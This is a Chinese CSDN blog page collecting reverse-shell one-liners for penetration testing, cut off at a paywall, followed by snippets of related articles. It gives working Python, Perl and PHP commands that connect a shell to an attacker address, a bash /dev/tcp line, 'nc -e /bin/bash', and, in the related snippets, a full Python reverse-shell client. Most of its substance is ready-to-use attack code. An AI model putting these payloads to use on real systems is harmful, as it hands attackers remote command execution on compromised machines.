反弹shell脚本

最新推荐文章于 2024-04-15 00:46:24 发布
最新推荐文章于 2024-04-15 00:46:24 发布
阅读量3.1k 收藏 8
点赞数
分类专栏: 渗透测试 文章标签: 安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/missmxr/article/details/121463766
版权
本文详细介绍了反弹shell的各种方法,包括使用Python、Perl、PHP、curl、bash、nc等工具,以及如何通过Perl和Python获取交互式shell,深入探讨了系统和Web安全中的反弹shell技巧。
摘要由CSDN通过智能技术生成

反弹shell脚本

一、反弹shell的各种姿势

  • python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • perl
perl -e 'use Socket;$i="10.10.14.23";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • php
<?php system('nc -e /bin/bash 10.10.14.6 4444')?>  //html版 
    
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'");?>    
    
php -r '$sock=fsockop
最低0.47元/天 解锁文章
维基人
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php反弹shell脚本
a1_pha的博客
01-24 706
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
安全知识】——LInux的shell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5980
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell汇总,看我一篇就够了
LainWith的博客
12-26 1万+
反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshellwebshell反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell:把命令行的输入输出转移到其它主机 Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通
反弹Shell大全与原理
weixin_55652418的博客
01-02 1101
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
反弹Shell的方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
Spring cloud function SpEL RCE批量检测脚本反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
PHP脚本反弹SHELL
10-20
脚本可以反弹SHELL到指定地址,得到交互交shell
反弹shell1
08-03
4. **Lua脚本反弹Shell** Lua是一种轻量级的脚本语言,可用于创建TCP连接并执行命令。示例代码展示了如何在Linux和Windows系统上使用Lua建立TCP连接,并通过连接执行命令。 5. **Meterpreter和Shellcode** `...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
JSP脚本反弹程序
10-20
实现shell反弹到指定地址,进行交互式SHELL管理!
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
安全反弹Shell的原理及18般利用姿势
qqchaozai的专栏
12-29 2068
前言 shell:一种用来执行操作系统指令的程序 反弹shell (reverse shell):一种让远程系统执行本地shell的程序。 1 原理 远程系统监听一个TCP/UDP端口,本地系统运行反弹shell反弹shell会连接该端口,并接收远程系统发送的shell指令,执行之后再将指令的输出流转发给远程系统。 1.1文件描述符 ...
反弹shell的命令大全
G3et的博客
03-21 857
【代码】反弹shell的命令大全。
实战攻击-php反弹shell
网络安全领域优质创作者
11-05 3060
以下均为实际攻击过程,记录笔记,仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录 得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...
反弹shell的N种姿势
yyj1781572的博客
08-06 617
在渗透测试过程中,经常会用到反弹shell,通过本实验的学习,了解反弹shell的概念和原理,掌握各种反弹shell的实现技术和方法。
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
内网渗透-反弹shell的N种姿势
最新发布
lza20001103的博客
04-15 896
内网渗透-反弹shell的N种姿势
常用的反弹shell脚本
weixin_30606461的博客
12-07 125
bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/443 0<&1 2>&1 Python shell 反弹脚本 #!/usr/bin/python # This is a Python reverse shell script import socket,subprocess,...
shell反弹的python脚本
08-25
以下是一个示例的Python代码,用于在远程主机上建立反向Shell连接: ```python import socket import subprocess def connect(): # 远程主机的IP和端口 ip = 'REMOTE_HOST_IP' port = REMOTE_HOST_PORT # 创建套接字对象 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # 连接到远程主机 s.connect((ip, port)) print('[+] Connected to {}:{}'.format(ip, port)) # 接收远程主机发送的命令,并执行 while True: command = s.recv(1024).decode() if command.lower() == 'exit': break output = subprocess.getoutput(command) s.send(output.encode()) except ConnectionRefusedError: print('[-] Connection refused') finally: s.close() if __name__ == '__main__': connect() ``` 在上述代码中,需要将`REMOTE_HOST_IP`和`REMOTE_HOST_PORT`替换为实际的远程主机的IP地址和端口号。然后将此代码保存为一个Python脚本文件,并在远程主机上运行该脚本。 当脚本与远程主机成功建立连接后,它将等待接收远程主机发送的命令,并通过执行这些命令来获取命令输出。然后将输出发送回远程主机。 请注意,使用此代码进行远程Shell连接可能涉及安全风险和不法行为。请确保您具有合法的授权,并且仅在合法的环境中使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值